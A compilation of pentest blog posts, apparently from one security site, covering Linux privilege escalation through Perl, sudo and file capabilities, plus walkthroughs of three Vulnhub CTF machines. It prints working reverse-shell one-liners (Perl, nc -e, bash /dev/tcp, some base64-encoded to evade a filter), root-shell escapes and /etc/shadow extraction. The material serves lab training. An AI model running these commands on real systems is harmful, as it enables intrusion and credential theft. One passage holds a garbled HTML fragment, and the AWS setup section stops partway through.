NOTE: “The main objective of publishing the series of “Linux for pentester” is to introduce the circumstances and any kind of hurdles that can be faced by any pentester while solving CTF challenges or OSCP labs which are based on Linux privilege escalations. Here we do not criticize any kind of misconfiguration that a network or system administrator does for providing higher permissions on any programs/binaries/files & etc.”

Table of Content

Overview of Perl

· Introduction: What is perl?

· Where we use perl?

· What are it’s neccesities?

· Multiple operation using perl.

Abusing Perl

· SUDO Lab setups for privilege Escalation

· Exploiting SUDO

· Capabilities

What is perl ?

Perl is a programming language that stands for "Practical Extraction and Reporting Language". It was created by Larry Wall in 1987 which is specially designed for text editing purpose. As we all knows computers understand only binary language i.e “0,1” or one can say low-level language, Which is vary difficult for humans to program in a binary language. So to overcome that difficulty we was needed a programming language which uses natural language elements, words that are used in common English language that can be easily understand by humans [high-level language].

So once a program is coded by human, it need to be converted into the form that a computer understands. For that, we need something which can translate the high-level language to low-level language. Here interpreter comes to our help which is a software that converts the program written in the high-level language to low-level language for the computer to understand and execute the instructions written in the program. Hence, Perl is an interpreted programming language.

It was originally a language optimized for scanning arbitrary text files, extracting information from those text files, and printing reports based on that information.

Where we use perl ?

The influence of Perl can be applied in many fields abd the most popular use of Perl is in Web development. As we know that the major role and purpose of perl is for text editing and extracting data and generating reports. Perl has become a popular language used in web development, networking and bioinformatics too. Apart from all this perl can also be used for CGI programming.

What are it’s necessities ?

As we all know there are many programming languagesthat can be used to do all the stuff which can be achieved by the help of perl.

So here is the question arises that, why should we specifically use “perl” ? Perl is very easy to learn, particularly if you have a background in computer programming. It is extremely portable which can run on any operating system that has Perl interpreter installed, so it is platform independent. All Linux Operating Systems come installed with Perl, so you can start Perl coding in Linux out of the box.

Alike other language Perl is faster and more powerful in performing many task. It possess many shortcuts which allow the user to write quick scripts. It was designed specifically for text processing. It built-in text processing ability makes Perl as widely used server-side programming language.

So on moving ahead in achieving our goal of Privilege Escalation vary first we will check for it’s version. For this purpose we will use “-v”option as shown below.

perl -v

To know more about all those operations that a perl can do we will use its help command which will direct us for other functionality.

perl -h

Multiple operation of perl

Help in scripting:As we know unlike other programs that are written in languages such as C and C++, Perl programs do not need to compile for its execution, it’s simply interprets and executes the Perl programs. The term script often is used for such interpreted programs written in a shell's programming language or in Perl.

For example as per below image you can see I’ve created a file “script.pl” in which I have stored some line of codes or can say have created a small script (one can use it in creating any script as per requirements) that need to execute program over screen. So, to view your script use command as bellow:

cat script.pl

perl script.pl

Help to execute code on command line:This can be used to run a piece of Perl code without creating a file. Due to differences between the Unix/Linux shell and the MS Windows Command prompt we need to use different quotes around our code.

Here in below screenshot I’m running a piece of code which is “Welcome to Ignite Technologies” by using “-e”argument to execute the same.

perl -e ‘print qq{Welcome to Ignite Technologies\n}’

Note: In simple words one can say that this option “-e” is used to execute or print one line of code.

Help in restricted shell environment:A user can use -e option to break out from restricted environments by spawning an interactive system shell and it palys an especial role in privilege escalation. By the help of this we can also run any command in a restricted environment. Suppose in our case here I’m using this option to run tail command for displaying last few lines of /etc/passwd file.

perl -e ‘exec “/bin/sh”; ‘

perl -e ‘exec “tail /etc/passwd’; ‘

Help to wrap the code in while loop: If we wish to wrap our code inside the loop which depends upon certain conditions within a code which is defined by perl then we will use “-n” option for that case.

For example, in below image you can see that I have a file named as “Infosec.txt” and here instead of displaying whole content I just want to print those lines which fulfil condition.

cat Infosec.txt

perl -n -E ‘say if /Testing/’ Infosec.txt

On framing above command perl will check to each line of file Infosec.txt and will print all those lines which contain our search word i.e Testing.

Help to edit file content:Perl command also be used in editing any file content. For executing the same we will use “-i” argument which will opens files one by one and replaces the content with STDOUT.

As you can see in below image I’ve used this option to convert the content of file Infosec.txt in upper case.

perl -pi -e “tr /[a-Z]/[A-Z]/” Infosec.txt

head -7 Infosec.txt

The most common use of “-p” together with the “-i” option also helps to provide "in-place editing". Which means that instead of printing to the screen, all the output spawned by our one-liner will be written back to the same file from where it was taken. Here we are using this to replace a word with other word.

perl -i -p -E ‘s/IGNITE/Egnite/’ Infosec.txt

head -7 Infosec.txt

On framing above command you perl will replace the word “IGNITE” with “Egnite” of file Infosec.txt

Perl in reverse shell: We all knows that reverse shell is a type of shell in which the target machine interconnects to the attacking machine and the attacking machine has a listener port on which it receives the connection.

So, here we are using perl command which will send back a reverse shell to a listening attacker that will open a remote network access.

perl -e 'use Socket;$i="192.168.29.157";$p=1234;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/bash -i");};'

On framing above command run nc -lvp 1234 on the attacker box to receive the shell.

nc -lvp 1234

whoami

Abusing perl

Sudo Rights Lab setups for Privilege Escalation

In above all, we have covered the main objectives that a perl can perform but now we will move ahead in the task of privilege escalation. So to grab this first, we have to set up our lab of perl command with administrative rights. After that we will check for the perl command that what impression it has after getting sudo rights and how we can use it more for privilege escalation.

From the below image It can be clearly understood I have created a local user (demo) who own all sudo rights as root and can achieve all task as admin.

To add sudo right open etc/sudoers file and type following as user Privilege specification.

demo All=(ALL) NOPASSWD: /usr/bin/perl

Exploiting Sudo rights

On adding user “demo” to etc/sudoers file, now we will start exploiting perl facility by taking the privilege of sudoer’s permission. For this very first we must have sessions of victim’s machine then only we can execute this task. Suppose we got the sessions of victim’s machine that will assist us to have local user access of the targeted system through which we can escalate the root user rights.

So now we will connect to the target machine with ssh, therefore, type following command to get access through local user login.

ssh demo@192.168.29.137

Then we look for sudo right of “demo” user (if given) and found that user “demo” can execute the perl command as “root” without a password.

whoami

sudo -l

sudo perl -e “/bin/bash”; ‘

whoami

Capabilities in Privilege Escalation

As we know that whenever any sticky bit is set to any file then every privileged and unprivileged user can easily access those files but if for security purpose if we want to share or get access those only with limited/single user then we can simply use capabilities for acquiring this operation.

The capability-based security states to the principle of manipulative user programs such that they directly share capabilities with each other according to the principle of least privilege to make transactions efficient and secure. For this task we simply copy the file to the /home of selected user to get it securely accessible.

As above stated where I’ve added user “demo” to /etc/sodoers and knows that user “demo” can execute the perl command as “root” without a password but I also except this user no one can access this file so I will set capabilities for this user as shown below.

which perl

cp $(which perl) /home/demo

setcap cap_setuid+ep /home/demo/perl

From below image it has been cleared that user “demo” can easily execute “perl” as root and hence we have successfully accomplished our mission of privilege escalation using perl.

./perl -e 'use POSIX (setuid); POSIX::setuid(0); exec "/bin/bash";'

Conclusion: The main influence of this article is to use “perl” command for privilege escalation that’s why we have just covered the basic operation that can be achieved by the use of this command.

↧

djinn:1 Vulnhub Walkthrough

November 27, 2019, 6:39 am

≫ Next: HA: Chanakya Vulnhub Walkthrough

≪ Previous: Linux for Pentester: Perl Privilege Escalation

Hello guys, today we will face an Intermediate challenge. Introducing the djinn: 1 virtual machine, created by “0xmzfr” and available on Vulnhub. This is another Capture the Flag Style Challenge where we have to escalate privileges to the “root user” and find 2 flag to complete the challenge.

Since these labs are available on the Vulnhub Website. We will be downloading the lab file from this link.

Penetration Methodologies:

· Network Scanning

o Netdiscover

o Nmap Scan

· Enumeration

o FTP Enumeration

o Browsing HTTP Service

o Netcat

o Directory Bruteforce using gobuster

o Discovering Command Injection

· Exploitation

o Bypassing Command Injection Filter

o Getting Netcat Session

o Enumeration Files and Directories

· Post Exploitation

o Reading the User Flag

o Getting Login Credentials

o Enumeration for Sudo Permissions

· Privilege Escalation

o Abusing Sudo Rights

o Confirm Root Access

o Reading the Root Flag

Walkthrough

Network Scanning

The first step is to identify the target. So, to identify your target we will use the following command:

netdiscover

Now we will use Nmap to gain the information about the open ports and the services running on the target machine using the command

nmap -p- 192.168.43.134

So as we can see that port 21/TCP is open so we can try for anonymous login to fetch some useful information.

Enumeration

Yes! We are in! There are three files here namely creds, game and message.

ftp 192.168.43.134

anonymous

We can see let’s try to download these three files in our kali machine and try to read their content

Command used to download these files are:

get creds.txt

get game.txt

get message.txt

We downloaded the all three files in our Kali machine and now it’s time to see the content of these files using the command cat

cat creds.txt

cat game.txt

cat message.txt

So we have three things that seems to be useful for us, but SSH port is filtered so clearly these creds can’t be used to login via SSH. let’s note down these three highlighted parts in a file for future reference.

But according the message.txt file there is a game running on port 1337. let’s play the game.

http://192.168.43.134:1337

We get an error: This page isn’t working. So in this case we will use Netcat to make connection so that we can play the game

nc 192.168.43.134 1337

As we can see in the above image that the we need to answer such simple maths question 1000 times and for sure we are not going to do that. The reason is: playing this game is time consuming and we are not sure about after solving 1000 times is there any gift for us which will help us or it’s just some greeting message to boost up our confidence.

So without wasting our time let’s try another port that is 7331

http://192.168.43.134:7331

We don’t find anything useful. after checking the source code there is no information that can be used to login to any of the account in the targeted machine. So now we can think of directory buster, means it’s time to find some hidden directories and pages at this particular port. We used the gobuster tool for directory Bruteforce. This gave us two pages ‘/genie’ and’/wish’.

gobuster dir -u http://192.168.43.134:7331 -w /usr/share/wordlists/dirb/big.txt

We opened the /genie page. It is showing an error that is ERROR 403. So this page might be of no use.

http://192.168.43.134:7331/genie

We open this another page named /wish. This contained text saying “Oh you found me then go on make a wish. This can make all your wishes come true.” Followed by a form input section and Submit button. This is absolutely interesting.

http://192.168.43.134:7331/wish

So it’s time to explore the /wish. As there is a form at this page so for a second we can think of OS command injection. Ok let’s try some common commands if we are going in right direction or not

So the “id” command is executed successfully. It means we were right before. This is OS command injection and we can take advantage of this vulnerability to get a shell using Netcat.

Let’s do it!

Exploitation

We started a Netcat listener on our Kali Machine. Then we tried to invoke the Netcat shell from the Command Injection that we just found.

nc -nlvp 1234

nc -e /bin/sh 192.168.43.249 1234

It gives a message: Wrong choice of words

So after trying lot of command we can conclude that some of the symbols are characters are restricted. if those characters are present in the command then the command is not going to be executed.

So after thinking a lot we came up with a solution what if encrypt the whole command in base64 format because commands like “echo”,” base64 -d” and “bash” are working.

Website used to encrypt: https://www.base64encode.org/enc/encore/

nc -e /bin/sh 192.168.43.249 1234

Encoded command: bmMgLWUgL2Jpbi9zaCAxOTIuMTY4LjQzLjI0OSAxMjM0

So now we will use pipe (|) operator to make our work done!

After experimenting a lot with /wish page we came up with this command:

echo bmMgLWUgL2Jpbi9zaCAxOTIuMTY4LjQzLjI0OSAxMjM0 | base64 -d | bash

But our luck is not good, this doesn’t work. It gives no error but this command doesn’t give us the shell access either. Now it’s time to search for some other forms of commands to get a shell and we will try this:

bash -i >& /dev/tcp/192.168.43.249/8080 0>&1

So we encoded this command using the same website. So now we will try the below written command in /wish page. Don’t forget to start the listener using the command shown below.

nc -nlvp 8080

YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjQzLjI0OS84MDgwIDA+JjE=

We got the shell using this technique. We ran the command whoami to find the user of which we just got the shell. It came out to be www-data.

We decided to look around the machine. We found a directory named 80 in the opt directory. We opened it. Here we find some files. We took at the app.py file. We found the path to a file named creds.txt. Let’s change the directory to the given directory and try to read the credentials.

cat app.py

We navigated to the path mentioned in that file. We found the credential for the user nitish.

cd /home

cd nitish/.dev/

cat creds.txt

We decided to login in as nitish. To do this we used the bash command. This invoked a bash shell, we converted that shell into a TTY shell using the python one liner.

bash

python -c 'import pty;pty.spawn("/bin/sh")'

We changed the user with the help of the su command. After entering the password that we found earlier we successfully logged in as nitish.

su nitish

p4ssw0rdStr3t0n9

whoami

Post Exploitation

Now that we reached a stage in out exploitation that we have the access of a user. We decided to look for the user flag that is hidden. We traversed into the nitish user home directory. Here we found the user.txt. This is the User Flag. Congratulations!! We found our first flag.

cd nitish

cat user.txt

Now it’s time to check for Sudo rights of the user nitish using the command:

sudo –l

We found that the user nitish can execute the genie binary without any password for user sam.

As this is a custom user generated script. We started tinkering it in order to understand the working of the script.

genie

genie -h

After messing around with this binary we successfully managed to get a shell of user sam using the command:

sudo -u sam genie -cmd new

whoami

Now we will try to get a stable shell using the command bash and after that we will check for sudo rights for the user sam. We again tried to enumerate the Sudo Permissions. As we can see that we can execute the /root/lago as root so let’s do it!

bash

sudo -l

Privilege Escalation

After trying a lot, we find a solution that it is possible if we can manage the correct number then we can get access to the root shell and yes we are right this time too. After multiple tried we enter the choice 2 and then type in “num” and successfully got a root shell.

sudo -u root /root/lago

num

whoami

We used the bash command to get a proper shell of the root user. Now that we are root user, we need to find the root flag. Instead to wandering here and there we decided to go to the root directory of the root user. Here, find a script named proof.sh.

bash

su root

We ran the script, It gave us the final root flag that was needed to complete this CTF Challenge.

./proof.sh

Author: Yash Saxena an undergraduate student pursuing B. Tech in Computer science and engineering with a specialization in cybersecurity and forensics from DIT University, Dehradun. Contact here.

↧

HA: Chanakya Vulnhub Walkthrough

November 27, 2019, 7:09 am

≫ Next: HA: Dhanush Vulnhub Walkthrough

≪ Previous: djinn:1 Vulnhub Walkthrough

Today we are going to solve our Boot to Root challenge called “HA Chanakya”. We have developed this lab for the purpose of online penetration practices. It is based on the Mastermind that took down kingdoms, one and only Chanakya. Let’s Solve it!!

Download Here

Level: Intermediate

Task: To Enumerate the Target Machine and Get the Root Access.

Penetration Methodologies

· Network Scanning

o Netdiscover

o Nmap Scan

· Enumeration

o Browsing HTTP Service

o Getting FTP Login Credentials

o FTP Login

· Exploitation

o Creating Authorized keys to login via SSH

o Transferring keys through FTP

o Logging via SSH

o Reading Chkrootkit logs

o Getting a reverse connection

o Spawning a TTY Shell

· Privilege Escalation

o Chkrootkit

Walkthrough

Network Scanning

netdiscover

Now that we have the Target Machine IP Address, our next logical step would be to do a port scan on the target to get information about the various services that are running on the target machine. After the Aggressive Scan of all the ports, we see that we have the SSH service (22), HTTP service (80), FTP service (21) running on the Target Machine.

nmap -A 192.168.1.101

Enumeration

Moving on, we observed that we have the HTTP service running. It is probable that a web page is hosted. So, we decided to take a look through our Web Browser. We did a thorough browsing of the webpage. We went through its source code and images, but there was no way in or any hint.

http://192.168.1.101

Till now we didn’t find any hint to establish our foothold, therefore we chose DIRB for directory brute force attack and Luckily found abuse.txt. After finding the abuse.txt, we decided to download this file to our attacker system for a close inspection. We used the wget command to download this file. Upon opening the file, we see that it contains some text that doesn’t make much sense. It must be encrypted.

dirb http://192.168.1.101/ -X .txt

abuse.txt

wget http://192.168.1.101/abuse.txt

cat abuse.txt

nfubxn.cpncat

After searching on the Internet for a while we found that ROT13 resembles to the text we found. So, we decided to decode the text using the ROT13 Decrypter found here. When we decrypted the encoded text to be the name of a packet capture file. Let’s find this file.

ashoka.pcapng

We decide to run the wget command directly on the IP Address in a hope that the packet capture file would be in the /var/www/html/ directory. Our suspicion was correct, the file was swiftly downloaded in our attacker machine. After downloading to inspect the file, we decided to inspect the file using Wireshark.

wget http://192.168.1.101/ashoka.pcapng

wireshark ashoka.pcapng

Opened the captured file in Wireshark, followed the tcp stream of ftp traffic and got one username ashoka and password kautilya.

User: ashoka

Pass: kautilya

Now that we have the FTP login credentials, we logged into the FTP Server. After logging in we ran the ls command to look around. We found ourselves in the root directory. So, we decided to make our way through ssh with placing the keys at this location. For that we created a directory named “.ssh”. After traversing in this newly created directory we went back to our native terminal.

ftp 192.168.1.101

ashoka

kautilya

ls -la

mkdir .ssh

cd .ssh

Exploitation

Now time to generate some ssh keys. We used the ssh-keygen to create some keys. We entered the password as “123”. This can be anything of your choice. We kept it so that its easy to remember. Moving on after the key is created, we moved into the .shh directory on out native shell. Here we saw that we have the key named “id_rsa.pub”. Now we need to upload this key to FTP so we copied the contents of the is_rsa.pub in the file named authorized_keys.

ssh-keygen

cd .ssh

cat id_rsa.pub > authorized_keys

We moved the authorized_keys to the home directory so that it is easier to transfer the file using the File Transfer Protocol. Now using the put command we transferred the file to the target machine.

put authorized_keys

Now we will be connecting to the target machine using the ssh. It will be possible to login now due to the authorized keys we placed earlier. We got a shell of the Ashoka user. After some enumeration, we see that we have a logs file inside the temp file. We tried to take a look at it using the cat command. It definitely looks like a Chkrootkit test results log. This is clue that we might be able to escalate privileges on this machine using Chkrootkit.

ssh ashoka@192.168.1.101

ls /tmp

cat /tmp/logs

Privilege Escalation
Now to Escalate Privileges on the target machine, we are going to need a meterpreter on the target machine which we are going to use get root with the help of the Metasploit. To do this we decided to take a meterpreter using the web_delivery exploit. First, we selected the web_delivery exploit with the help of use command followed by providing the lhost. Lhost is the IP Address of our target machine (Kali Linux). At the end we will type in exploit. This will create a one line script for us that will give us a meterpreter over the target machine.

use exploit/multi/script/web_delivery

set lhost 192.168.1.107

exploit

We copied the said command generated by the exploit and ran over the ssh session we got earlier.

This gave us the session we required to work. We are going to use the inbuilt exploit in the Metasploit that could help us get root shell over the target machine. We selected the session and provide the port for another session. After typing in exploit we see that the exploit is working and it gave us another shell over the port mentioned earlier.

use exploit/unix/local/chkrootkit

set session 1

set lport 8888

exploit

To convert the shell into a proper working shell, we ran the python one liner to spawn a TTY shell. We looked around and found a text file name final.txt, we opened it to find the final flag. We did it. This concludes this lab.

python -c 'import pty;pty.spawn("/bin/bash")'

cat final.txt

↧

HA: Dhanush Vulnhub Walkthrough

November 28, 2019, 5:56 am

≫ Next: Linux Privilege Escalation using Capabilities

≪ Previous: HA: Chanakya Vulnhub Walkthrough

Today we are going to solve our Boot to Root challenge called “HA Dhanush”. We have developed this lab for the purpose of online penetration practices. It is based on the weapon that was part of all the wars in the medieval times. The Bow and Arrow. As the lab is titled Dhanush. Some information about the Indian Mythology and Bows might help. Let’s Solve it!!

Download Here

Level: Intermediate

Task: To Enumerate the Target Machine and Get the Root Access.

Penetration Methodologies

· Network Scanning

o Netdiscover

o Nmap Scan

· Enumeration

o Browsing HTTP Service

o Creating Dictionary from the Webpage

· Exploitation

o Bruteforce the SSH

o Generating SSH Public key for another user

o Logging in as another user

· Privilege Escalation

o Identify Sudo Rights to zip command

o Abusing Sudo Rights

· Reading Root Flag

Walkthrough

Network Scanning

netdiscover

Now that we have the Target Machine IP Address, our next logical step would be to do a port scan on the target to get information about the various services that are running on the target machine. We usually do just the Aggressive Scan, but in this case, we are going for all port scan. By default, Nmap scans the most common 1,000 ports for each protocol. So, we can specify -p- to scan ports from 1 through 65535. This is done as it is safe practice to change the port of a service to an uncommon port. After the scan of all the ports, we see that we have the HTTP service (80), SSH service (65345) running on the Target Machine.

nmap -p- -A 192.168.1.101

Enumeration

Now, before moving further, we thought as this webpage contains tons of information over the Dhanushs. Also, these can be probably usernames or passwords. So, we decided to make a dictionary using the cewl command.

cewl http://192.168.1.101/ -w dict.txt

cat dict.txt

Exploitation

We decide to start our attempt to exploit this target machine from the port which the author has gone lengths to protect from the naked eye. The port number 65345 with the SSH service. As we have no usernames or the passwords so we decide to bruteforce this ssh login using the dictionary that we just created. We will be using the hydra for the login bruteforce. We are in luck; we got the login credentials for the SSH.

Username: pinak

Password: Gandiv

hydra -L user.txt -P dict.txt 192.168.1.101 ssh -s 65345 -e nsr

Now that we have the login credentials for the SSH, we decided to login and take a look. We ran the sudo -l command to check the sudoers list and found that cp command which works runs as sarang user without any password, hence it can be used. So, we decided to take a look at the user sarang. In the home directory of sarang we see a hidden directory labelled “.ssh”. We tried to open it but it was restricted.

ssh pinak@192.168.101 -p 65345

sudo -l

cd /home/sarang

ls -la

cd .ssh

We decided to use the cp command to get inside the sarang user. To do this we will be needing the ssh keys to be present in the .ssh directory inside the sarang user home directory. Now although the file is restricted to read but we can use the cp command to send the keys inside that directory. To do this first we need to generate those keys. We will be using the ssh-keygen for that particular purpose. After working with ssh-keygen, we move into the .ssh directory inside the pinak user home directory to find the id_rsa public key. We gave it proper permissions. And moved it to the pinak user home directory as shown in the image given.

ssh-kegen

cd .ssh

chmod 777 id_rsa.pub

cp id_rsa.pub /home/pinak

Now that we have transferred the public key, its time use the cp command as user sarang to copy the public key inside the .ssh directory in sarang user home directory. We need to use sudo alongwith the cp command and provide the source directory and destination directory. After doing this, all we need it to login as sarang with the key that we just transferred. We can see that it works nicely. After the successful login as the user sarang, we ran the sudo -l command again as this user is not root and out target is to get root. We see that the zip command has the sudo right that can be abused to escalate privilege on this machine.

sudo -u sarang /bin/cp ./id_rsa.pub /home/sarang/.ssh/authorized_keys

ssh sarang@127.0.0.1 -i /.ssh/id_rsa -p 65345

sudo -l

Privilege Escalation

We use recently logged in through ssh as user sarang. Then we use the sudo command to list all the commands the user can run with root privileges and we can see that the user can run zip commands as root without the need to enter any password.

So, now in the process of escalating the privileges from “sarang” to “root”. At first, we create a file ‘raj’ than we perform three different tasks in a single line of code: first, we zip the file ‘raj’ second move it to /home/raj.zip folder and lastly unzip it which will pop the root shell.

touch raj

pwd

sudo zip /tmp/raj.zip /home/sarang/raj -T --unzip-command="sh -c /bin/bash"

cd /root

cat flag.txt

Finally, we get ‘flag.txt’ inside the root directory. Hence, we accomplished our mission to get the root shell on this Boot2Root Machine.

↧

Linux Privilege Escalation using Capabilities

November 30, 2019, 12:40 am

≫ Next: Web Application Pentest Lab Setup on AWS

≪ Previous: HA: Dhanush Vulnhub Walkthrough

In this article we will discuss about the mechanism of “capability” and Privilege escalation by abusing it. As we know when the system creates a work context for each user where they achieve their tasks with the privileges that are assigned to them. So, to provide some specific functionalities, it is necessary for a non-privileged user to sometimes temporarily acquire a superuser profile to perform a specific task.

This functionality mainly can be achieved by assigning privileges through sudo, or setuid permissions to an executable file which allows the user to adopt the role of file owner.

To accomplish same task in more secure way the system admin uses “capability” which plays an effective role in the security of Linux based operating systems.

Table of Content

Introduction to Capability

· What is capability?

· Difference between capability and SUID.

· Use of capabilities.

· List of capability

Abusing capability for Privilege Escalations

· Python3

· Perl

· Tar

Introduction to Capability

What is capability in Linux

Before capabilities, we only had the binary system of privileged and non-privileged processes and for the purpose of performing permission checks, traditional UNIX implementations distinguish two categories of processes: privileged processes that referred as superuser or root and unprivileged processes (who’s effective UID is nonzero).

Capabilities are a per-thread attribute that can be independently enabled and disabled.

Difference between capability and SUID

SUID:SUID stands for set user ID and allow users to execute the file as the file owner. This is defined as giving temporary access to a user to run a program/file with the permissions of the file’s owner rather that the user who runs it. This can easily be detect by the use of “Find” command. To find all files with SUID set in the current directory we can use-perm option which will print files only with permissions set to 4000.

Capability: Security of Linux systems can be improved by using many actions. One of these measures is called Linux capabilities which are maintained by the kernel. In other word we can say that they are a little unintelligible but similar in principle to SUID. Linux’s thread privilege checking is based on capabilities.

Uses of capabilities

Capabilities work by breaking the actions normally reserved for root down in to smaller portions. The use of capabilities is only beginning to drop in to user land applications as most system utilities do not shed their root privileges. Let’s move ahead that how we can use this permission more into our task.

Limited user’s permission: As we know Giving away too many privileges by default will result in unauthorized changes of data, backdoors and circumventing access controls, just to name a few. So to overcome with this situation we can simply use capability to limited user’s permission.

Using a fine-grained set of privileges: Use of capability can be more clearly understand by another example. Suppose a web server normally runs at port 80 and we also know that we need root permissions to start listening on one of the lower ports (<1024 80.="" 80="" a="" able="" all="" be="" binary="" can="" cap_net_bind_service.="" capability="" daemon="" easier="" giving="" in="" instead="" it="" like="" listen="" much="" needs="" o:p="" of="" on="" open="" permissions="" port="" related="" root="" server="" set="" specific="" the="" this="" to="" up="" way.="" we="" web="" with="">1024>

Working with capability

The operation of capabilities can be achieved by in many ways. Some of them are listed as below:

Assigning and removing capability: They are usually set on executable files and are automatically granted to the process when a file with a capability is executed. The file capability sets are stored in an extended attribute named as security.capability. This can be done by the use of attribute CAP_SETCAP capability.

To enable the capability for any file frame command as shown below:

setcap cap_setuid+ep /home/demo/python3

Simillarly one can also remove file capability by as below mentioned command.

getcap -r / 2>/dev/null

Reading capability: There are many files or program to which capability are predefined so to view that a file has any capability set then you can simply run command as:

setcap -r /home/demo/python3

If you'd like to find out which capabilities are already set on your system, you can search your whole file-system recursively with the following command:

getcap -r / 2>/dev/null

List of Capability

On the basis of functionality, the capability is categorized into total 36 in count. Some of majorly used are shown below.

Abousing Capabilities Privilege Escalations

Python Capabilities

Suppose the system administrator wants to grant superuser permission for any binary program, let's say for python3, which should only be available to a specific user, and admin doesn't want to give SUID or sudo permission. The admin supposed to used capabilities, for the python3 program that should be execute by specific user let’s say for user “demo”. This can be accomplished with following commands on host machine.

which python3

cp /usr/bin/python3 /home/demo/

setcap cap_setuid+ep /home/demo/python3

As result the user demo received the privilege to run python3 program as root, because here admin has upraised the privilege by using cap_setuid+ep which means all privilege is assign to user for that program. But if you will try to find 4000 permission files or programs then it might not be show for /home/dome/python3.

Note: the user home directory should be not accessible for other user because if it is accessed to other non-root user then other users will also proficient to take privilege of capabilities set for user demo.

Exploiting capabilities using python3

Assuming an intruder has compromised the host machine as local user and spawn the least privilege shell and he looked for system capabilities and found empty capability (ep) over suid is given python3 for user demo that means all privilege is assign to user for that program, therefore taking advantage of this permission he can escalated into high privilege from low privilege shell.

getcap -r / 2>/dev/null

pwd

ls -al python3

./python3 -c 'import os; os.setuid(0); os.system("/bin/bash ")'

Hence you can observe the local user demo has accessed the root shell as shown in the given image.

Perl Capabilities

We have another example “perl” which is same as above where the admin supposed to used capabilities, for the perl program that should be execute by specific user let’s say for user “demo”. This can be accomplished with following commands on the host machine.

which perl

cp /usr/bin/perl /home/demo/

setcap cap_setuid+ep /home/demo/perl

Exploiting capabilities using perl

Repeat above step for exploit perl program to escalate the root privilege:

getcap -r / 2>/dev/null

pwd

ls -al perl

./perl -e 'use POSIX (setuid); POSIX::setuid(0); exec "/bin/bash";'

Tar Capabilities

We have another example “tar” which is same as above where the admin supposed to used capabilities to extract high privilege file that are restricted for other users, that should be extract by specific user let’s say by user “demo”.

Let’s take an example: The admin wants to assign a role, where the user “demo” can take the backup of files as root, for this task the admin has set read capability on tar program. This can be accomplished with following commands on the host machine.

which tar

cp /bin/tar /home/demo/

setcap cap_dac_read_search+ep /home/demo/tar

Exploiting capabilities using tar

Repeat same procedure to escalate the privilege, take the access of host machine as local user and move ahead for privilege escalation. Since this time admin has use CAP_DAC_READ_SEARCH that will help us to bypass file read permission checks and directory read and execute permission checks.

getcap -r / 2>/dev/null

pwd

ls -al tar

In this we try to read shadow file where all system’s user password hashes are stored for this you have follow below steps.

· Compress the /etc/shadow in current directory with the help of tar program.

· You will get shadow.tar in your current directory.

· Extract the shadow.tar and you will get a directory as “etc/shadow”.

· Use cat/head/tail or program to read the hashes of passwords.

./tar cvf shadow.tar /etc/shadow

./tar -xvf shadow.tar

As result you will have “etc/shadow” file your current directory and you can read the hashes of password as shown here.

tail -8 etc/shadow

A malicious user can break this password using tool such john the ripper or hash killer etc.

Conclusion: The system admin should be aware of security loopholes during assigning such capability which can effect the integrity of kernel that can led to privilege escalation.

↧

Web Application Pentest Lab Setup on AWS

December 3, 2019, 12:05 am

≫ Next: Windows for Pentester: Certutil

≪ Previous: Linux Privilege Escalation using Capabilities

Isn't it going to be nice if you can reach your pen-testing lab from all over the world? As we all know, this is a digital age that makes life easier than our expectations, thus anyone can access their information/data from the cloud. Similarly, a Pentester can design its pen-testing environment for vulnerable machine on cloud that can be accessible from anywhere. AWS is probably the most popular cloud service available in todays date, with most companies taking a cloud or hybrid approach towards their infrastructure.

This article is about setting up a vulnerable lab for web penetration in Amazon Web Services (AWS) to perform pen-testing on.

Table of Content

Prerequisite

Setup & Configuration of AWS Instance

Deployment & Connectivity

Install Dependencies

· Apache

· MySql - server

· PHP

· Configuring MySql

· Phpmyadmin

Lab Setup

· DVWA

· Sql Injection - Dhakkan

· OWASP Mutillidae II

Prerequisite

To setup your own pen-testing environment, you must have AWS account or if not then create an AWS account and login your account.

Setup & Configuration of AWS Instance

Let’s walk through the process of setting up the lab, we will be making an EC2 instance with Ubuntu Server 18.04 LTS on it. An EC2 instance is refer as virtual server in Amazon’s Elastic Compute Cloud (EC2) for running applications on the AWS infrastructure. The good thing is that this will not cost you anything to build as AWS has options to setup instances within a certain computing level that are not charged for.

1. Open the EC2 console in AWS.

2. Navigate to “Launch Instance” and click on “Launch Instance”.

3. Choose the Amazon machine image (AMI), this is basically similar to finding the iso file of the OS that you want on your instance. AWS has you covered with most of the popular OS’s available in its inventory.

4. Here we looked for ubuntu.

5. Now that we see the OS that we want running on our instance, we need to choose the “64-bit (x86)”.

6. We now need choose our instance type, to basically define the amount of hardware this instance will have, we choose the “t2.micro”. This gives us I virtual CPU and 1 GB of RAM.

For most general-purpose workloads, T2 Unlimited instances will provide ample performance without any additional charges.

Features:

· High frequency Intel Xeon processors

· Burstable CPU, governed by CPU Credits, and consistent baseline performance

· Lowest-cost general purpose instance type, and Free Tier eligible*

· Balance of compute, memory, and network resources

Windows for Pentester: Certutil

December 3, 2019, 1:04 am

≫ Next: In Plain Sight:1: Vulnhub Walkthrough

≪ Previous: Web Application Pentest Lab Setup on AWS

In this article, we are going to describe the utility of Certutil tool and how vital it is in Windows Penetration Testing.

TL; DR

Certutil is a preinstalled tool on Windows OS that can be used to download malicious files and evade Antivirus. It is one of the Living Off Land (LOL) Binaries.

Disclaimer

The main objective of publishing the series of “Windows for Pentester” is to introduce the circumstances and any kind of hurdles that can be faced by any Pentester while solving CTF challenges or OSCP labs which are based on Windows Operating System. Here, we do not criticize any kind of misconfiguration that a network or system administrator does for providing higher permissions on any kind of programs/binaries/files & etc.”

Table of Content

· Introduction

o What is certutil?

o What is Living off Land?

o Working with certutil?

o What is Alternative Data Stream (ADS)?

· Configurations used in Practical

· Working with certutil

o Encoding

o Decoding

o Hashing

o Downloading

o Reading Error Code

· Penetration Testing using certutil

o Compromising using Malicious Executable

o Compromising with Encoded Malicious DLL

o Compromising with Malicious Executable inside ADS

· Mitigation

· Conclusion

Introduction

What is Certutil?

Certutil is a CLI program that can be used to dump and display certificate authority (CA), configuration information, configures Certificate Services, backup and restore CA components, and verify certificates, key pairs, and certificate chains. It is installed as a part of Certificate Services.

What is Living off Land?

